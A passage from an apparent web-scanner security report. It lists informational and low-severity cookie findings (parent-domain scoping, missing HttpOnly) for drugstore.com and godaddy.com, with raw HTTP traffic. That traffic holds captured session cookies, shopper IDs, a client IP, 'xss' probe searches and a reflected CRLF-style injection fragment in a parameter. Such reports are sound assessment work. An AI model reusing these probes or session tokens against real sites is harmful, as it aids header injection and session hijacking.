s_sess=%20s_cc%3Dtrue%3B%20abtest%3DABTEST_20060410_bizrate%257C0%3B%20s_sq%3Ddrugstorecomglobalprod%253D%252526pid%25253Dotc%2525253Ahomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/icon_search.gif%252526ot%25253DIMAGE%3B; s_vi=[CS]v1|2739BCD58514B3D4-4000018C2004D12D[CE]; _br_uid_1=uid%3D5299788113416%3A; __cmbDomTm=0; __cmbU=ABJeb1_3NV-wS9CA4xNFiv3ShLSU4iGgty4u6k9WHsPFv60ohMiFdyhiaxwr6ZVfLN137aUZJTCXZJufx_taXD_Nnqj8E6TcGg; __cmbTpvTm=1058
Response
HTTP/1.1 200 OKSet-Cookie: STICKY=SEAWEB038P:7B1B08A6C5BF4A968C79C9BFB007FDD0:yonvhm55shpcsh45w02oevnl; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/ =2316609728.0.0000; expires=Fri, 16-Sep-2011 17:31:39 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]...
10.36. http://www.drugstore.com/search/search_results.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.drugstore.com
Path:
/search/search_results.asp
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:STICKY=SEAWEB038P:7B1B08A6C5BF4A968C79C9BFB007FDD0:moymzk55ygfcmm45khc4ln45; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/
Request
GET /search/search_results.asp?N=0&Ntx=mode%2Bmatchallpartial&Ntk=All&srchtree=1&Ntt=xss%5C&Go.x=0&Go.y=0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7:7B1B08A6C5BF4A968C79C9BFB007FDD0:jy0lemycstoxx3j2aggf0d55; ASP.NET_SessionId=tujq4xeiqb4bta55tp0jzqna; drugstore%2Efish=UserID=57ABB42C1945443F8A38894F54FEB227; ABTests=07082011_tns_abtest=abtest_not_qualified@&20051228_entrypages=1@09/16/2011 9:30:24 AM&091211_GWP_YTC=1@09/16/2011 9:30:24 AM&040610_bizrate_beauty=1@09/16/2011 9:30:24 AM&030411_click2chat_dscm=1@09/16/2011 9:30:24 AM&110210_bizrate_VD=abtest_not_qualified@&20090319_ForeSee_Vision=abtest_not_qualified@&pdetails_ver2=1@09/16/2011 9:30:24 AM&20060410_bizrate=0@09/16/2011 9:30:24 AM&20070530_GoogleCheckout=1@09/16/2011 9:30:24 AM&aggregate_knowledge=1@09/16/2011 9:30:24 AM&ship_interrupt=2@09/16/2011 9:30:24 AM&05262011_ivd_ciba_25percent_off=abtest_not_qualified@; BIGipServerdscm_farm=2316609728.0.0000; s_sess=%20s_cc%3Dtrue%3B%20abtest%3DABTEST_20060410_bizrate%257C0%3B%20s_sq%3Ddrugstorecomglobalprod%253D%252526pid%25253Dotc%2525253Ahomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/icon_search.gif%252526ot%25253DIMAGE%3B; s_vi=[CS]v1|2739BCD58514B3D4-4000018C2004D12D[CE]; _br_uid_1=uid%3D5299788113416%3A; __cmbDomTm=0; __cmbU=ABJeb1_3NV-wS9CA4xNFiv3ShLSU4iGgty4u6k9WHsPFv60ohMiFdyhiaxwr6ZVfLN137aUZJTCXZJufx_taXD_Nnqj8E6TcGg; __cmbTpvTm=1058
Response
HTTP/1.1 302 Found/pharmacy/drugindex/rxsearch.asp?search=essSet-Cookie: STICKY=SEAWEB038P:7B1B08A6C5BF4A968C79C9BFB007FDD0:moymzk55ygfcmm45khc4ln45; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/ =2316609728.0.0000; expires=Fri, 16-Sep-2011 17:31:37 GMT; path=/>.drugstore.com/pharmacy/drugindex/rxsearch.asp?search=ess">here</a>.</h2>
10.37. http://www.godaddy.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:preferences1=_sid=jcwejcfjxbngwdkfvgmjwimgygceujtc&gdshop_currencyType=USD&dataCenterCode=US; domain=godaddy.com; path=/ currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:07:18 GMT; path=/ traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=19; domain=godaddy.com; path=/
Request
GET / HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7
Response
HTTP/1.1 200 OKSet-Cookie: preferences1=_sid=jcwejcfjxbngwdkfvgmjwimgygceujtc&gdshop_currencyType=USD&dataCenterCode=US; domain=godaddy.com; path=/ Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:07:18 GMT; path=/ mageTwo; path=/Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=19; domain=godaddy.com; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
10.38. http://www.godaddy.com/Domains/Controls/JsonContent/DotTypePricing.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/Domains/Controls/JsonContent/DotTypePricing.aspx
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/DotTypePricing.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=tab=general&callback=tabFill&targetDivId=tab2&tabFill=jsonp1316214560432&_=1316214560519&shopper=46215684&privatelabelid=1&isc=eebc2%0d%0&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/ currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:29 GMT; path=/
Request
GET /Domains/Controls/JsonContent/DotTypePricing.aspx?tab=general&callback=tabFill&targetDivId=tab2&tabFill=jsonp1316214560432&_=1316214560519 HTTP/1.1/domains/search.aspx;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; ASP.NET_SessionId=kwd42kibl1s4hu55omguef55; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; HPBackground=DanicaImageTwo; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; currency1=potableSourceStr=USD; adc1=US; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1
Response
HTTP/1.1 200 OKSet-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/DotTypePricing.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=tab=general&callback=tabFill&targetDivId=tab2&tabFill=jsonp1316214560432&_=1316214560519&shopper=46215684&privatelabelid=1&isc=eebc2%0d%0&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/ Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:29 GMT; path=/ \n #pricing_table tr#table_header td#header_bg{background-image: url(http://img1.wsimg.com/fos/bkg/42293_chart_topbar.gif);backgrou...[SNIP]...
10.39. http://www.godaddy.com/Domains/Controls/JsonContent/generalPricing.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/Domains/Controls/JsonContent/generalPricing.aspx
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:30 GMT; path=/ traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/generalPricing.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=TargetDivID=general_pricing_json_content&_=1316214561887&shopper=46215684&privatelabelid=1&isc=eebc2%0d%0&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/
Request
GET /Domains/Controls/JsonContent/generalPricing.aspx?TargetDivID=general_pricing_json_content&_=1316214561887 HTTP/1.1/domains/search.aspx;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; ASP.NET_SessionId=kwd42kibl1s4hu55omguef55; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; HPBackground=DanicaImageTwo; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/DotTypePricing.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=tab=general&callback=tabFill&targetDivId=tab2&tabFill=jsonp1316214560432&_=1316214560519&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; currency1=potableSourceStr=USD; adc1=US; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:30 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/generalPricing.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=TargetDivID=general_pricing_json_content&_=1316214561887&shopper=46215684&privatelabelid=1&isc=eebc2%0d%0&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/ \n .general_year_header {font-weight:bold;background-color: #DDDDDD; color:#000;text-align:center;font-size: 13px;padding:5px;}\r\n .genera...[SNIP]...
10.40. http://www.godaddy.com/domains/search.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/domains/search.aspx
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:28 GMT; path=/ traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=71bf3%0d%0&clientip=50.23.123.106&referringpath=fb691c64-72f6-4f9a-b525-0b2548cfab03&referringdomain=&split=95; domain=godaddy.com; path=/ BlueLithium_domainsearch=jauafgggzbdbdhedqdvejhcgpjbacdnd; domain=godaddy.com; path=/
Request
GET /domains/search.aspx HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; ASP.NET_SessionId=kwd42kibl1s4hu55omguef55; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; HPBackground=DanicaImageTwo; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; currency1=potableSourceStr=USD; adc1=US; traffic=cookies=1&referrer=&sitename=mya.godaddy.com&page=/Default.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=idpinfo=none&myaurl=%2fdefault.aspx&ci=13025&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:28 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=71bf3%0d%0&clientip=50.23.123.106&referringpath=fb691c64-72f6-4f9a-b525-0b2548cfab03&referringdomain=&split=95; domain=godaddy.com; path=/ Set-Cookie: BlueLithium_domainsearch=jauafgggzbdbdhedqdvejhcgpjbacdnd; domain=godaddy.com; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
10.41. http://www.godaddy.com/gdshop/site_search.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/gdshop/site_search.asp
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:traffic=server=M1PWCORPWEB181&sitename=www%2Egodaddy%2Ecom&cookies=1&clientip=50%2E23%2E123%2E106&status=200+OK&referrer=http%3A%2F%2Fwww%2Egodaddy%2Ecom%2F&isc=&privatelabelid=1&page=%2Fgdshop%2Fsite%5Fsearch%2Easp&referringdomain=&referringpath=2a590ae0%2D0ee8%2D47bd%2D8061%2Daf016da64611&shopper=46215684&querystring=ci%3D9104%26pageNum%3D1%26searchFor%3Dxss; domain=.godaddy.com; path=/
Request
POST /gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7=vb1jphe2sxzvygvmo3bblx55; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; SplitValue1=19; HPBackground=DanicaImageOne; currency1=potableSourceStr=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; traffic=; pathway=2a590ae0-0ee8-47bd-8061-af016da64611; pagecount=1; actioncount=; app_pathway=; visitor=vid=2a590ae0-0ee8-47bd-8061-af016da64611; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1-urlencoded
Response
HTTP/1.1 200 OKSet-Cookie: traffic=server=M1PWCORPWEB181&sitename=www%2Egodaddy%2Ecom&cookies=1&clientip=50%2E23%2E123%2E106&status=200+OK&referrer=http%3A%2F%2Fwww%2Egodaddy%2Ecom%2F&isc=&privatelabelid=1&page=%2Fgdshop%2Fsite%5Fsearch%2Easp&referringdomain=&referringpath=2a590ae0%2D0ee8%2D47bd%2D8061%2Daf016da64611&shopper=46215684&querystring=ci%3D9104%26pageNum%3D1%26searchFor%3Dxss; domain=.godaddy.com; path=/ /xhtml1/DTD/xhtml1-transitional.dtd"><html>...[SNIP]...
10.42. http://www.godaddy.com/offers/hot-deals.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/offers/hot-deals.aspx
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:32 GMT; path=/
Request
GET /offers/hot-deals.aspx?ci=13478 HTTP/1.1/domains/search.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; ASP.NET_SessionId=kwd42kibl1s4hu55omguef55; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; HPBackground=DanicaImageTwo; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; currency1=potableSourceStr=USD; adc1=US; traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/generalPricing.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=TargetDivID=general_pricing_json_content&_=1316214561887&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95
Response
HTTP/1.1 302 Found/offers/hot-deals2.aspx?ci=51455&isc=d0d8de1c80Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:32 GMT; path=/ >.com/offers/hot-deals2.aspx?ci=51455&isc=d0d8de1c80">here</a>.</h2>
10.43. http://www.godaddy.com/offers/hot-deals2.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/offers/hot-deals2.aspx
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:35 GMT; path=/ traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/offers/hot-deals2.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=51455&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/
Request
GET /offers/hot-deals2.aspx?ci=51455 HTTP/1.1/domains/search.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; ASP.NET_SessionId=kwd42kibl1s4hu55omguef55; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; HPBackground=DanicaImageTwo; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/generalPricing.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=TargetDivID=general_pricing_json_content&_=1316214561887&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; currency1=potableSourceStr=USD; adc1=US
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:35 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/offers/hot-deals2.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=51455&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
10.44. http://www.godaddy.com/offers/jsoncontent/recommendedoffers.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/offers/jsoncontent/recommendedoffers.aspx
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:traffic=cookies=1&referrer=http://www.godaddy.com/offers/hot-deals2.aspx?ci=51455&sitename=www.godaddy.com&page=/offers/jsoncontent/recommendedoffers.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=51455%2c50960&callback=jsonContent._fill&targetDivId=tab1&jsonContent._fill=jQuery15108357319077476859_1316214566272&_=1316214567345&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/
Request
GET /offers/jsoncontent/recommendedoffers.aspx?ci=51455%2c50960&callback=jsonContent._fill&targetDivId=tab1&jsonContent._fill=jQuery15108357319077476859_1316214566272&_=1316214567345 HTTP/1.1/offers/hot-deals2.aspx?ci=51455;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; ASP.NET_SessionId=kwd42kibl1s4hu55omguef55; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; HPBackground=DanicaImageTwo; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; currency1=potableSourceStr=USD; adc1=US; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=
Response
HTTP/1.1 200 OKSet-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/offers/hot-deals2.aspx?ci=51455&sitename=www.godaddy.com&page=/offers/jsoncontent/recommendedoffers.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=51455%2c50960&callback=jsonContent._fill&targetDivId=tab1&jsonContent._fill=jQuery15108357319077476859_1316214566272&_=1316214567345&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/ :"\r\n \u003cdiv class=\"dealstitle\"\u003e\r\n \u003ch3\u003eRecommended Offers\u003c/h3\u003e\r\n \u003ch4\u003eDo more online with special savings on the products yo...[SNIP]...
10.45. http://www.godaddy.com/productadvisor/pastart.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/productadvisor/pastart.aspx
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:07:38 GMT; path=/ traffic=cookies=1&referrer=http://www.godaddy.com/gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss&sitename=www.godaddy.com&page=/productadvisor/pastart.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=13108&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=2a590ae0-0ee8-47bd-8061-af016da64611&referringdomain=&split=19; domain=godaddy.com; path=/
Request
GET /productadvisor/pastart.aspx?ci=13108 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss=vb1jphe2sxzvygvmo3bblx55; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; SplitValue1=19; HPBackground=DanicaImageOne; currency1=potableSourceStr=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; traffic=; pathway=2a590ae0-0ee8-47bd-8061-af016da64611; pagecount=2; actioncount=; app_pathway=; visitor=vid=2a590ae0-0ee8-47bd-8061-af016da64611; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=0&fMajorVer=0&slMajorVer=-1&slMinorVer=-1; domainYardVal=%2D1; serverVersion=A; ASPSESSIONIDQCRSARQR=BGAMBCHBECAECHGCHMMADCKA
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:07:38 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss&sitename=www.godaddy.com&page=/productadvisor/pastart.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=13108&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=2a590ae0-0ee8-47bd-8061-af016da64611&referringdomain=&split=19; domain=godaddy.com; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
10.46. http://www.godaddy.com/productadvisor/productadvisor.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/productadvisor/productadvisor.aspx
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:07:40 GMT; path=/
Request
GET /productadvisor/productadvisor.aspx?callback=atlPrdiFillDiv&commandname=setenv¶ms=lpage HTTP/1.1;q=0.7/productadvisor/pastart.aspx?ci=13108=vb1jphe2sxzvygvmo3bblx55; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; SplitValue1=19; HPBackground=DanicaImageOne; currency1=potableSourceStr=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; traffic=cookies=1&referrer=http://www.godaddy.com/gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss&sitename=www.godaddy.com&page=/productadvisor/pastart.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=13108&shopper=&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=2a590ae0-0ee8-47bd-8061-af016da64611&referringdomain=&split=19; pathway=2a590ae0-0ee8-47bd-8061-af016da64611; pagecount=2; actioncount=; app_pathway=; visitor=vid=2a590ae0-0ee8-47bd-8061-af016da64611; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=0&fMajorVer=0&slMajorVer=-1&slMinorVer=-1; domainYardVal=%2D1; serverVersion=A; ASPSESSIONIDQCRSARQR=BGAMBCHBECAECHGCHMMADCKA
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:07:40 GMT; path=/ \u000d\u000a\u0009\u0009\u0009<div id=\"ProductAdvisorDiv\" style=\"display:block;\">\u000d\u000a\u0009\u0009\u0009\u0009<table cellspacing=\"0\" cellpadding=\"0\" border=\"0\"...[SNIP]...
11. Cookie without HttpOnly flag set
previous
next
There are 80 instances of this issue:
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
11.1. http://ads.adxpose.com/ads/ads.js
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://ads.adxpose.com
Path:
/ads/ads.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=B5098A49587B3A6D5F19777D607A999A; Path=/
Request
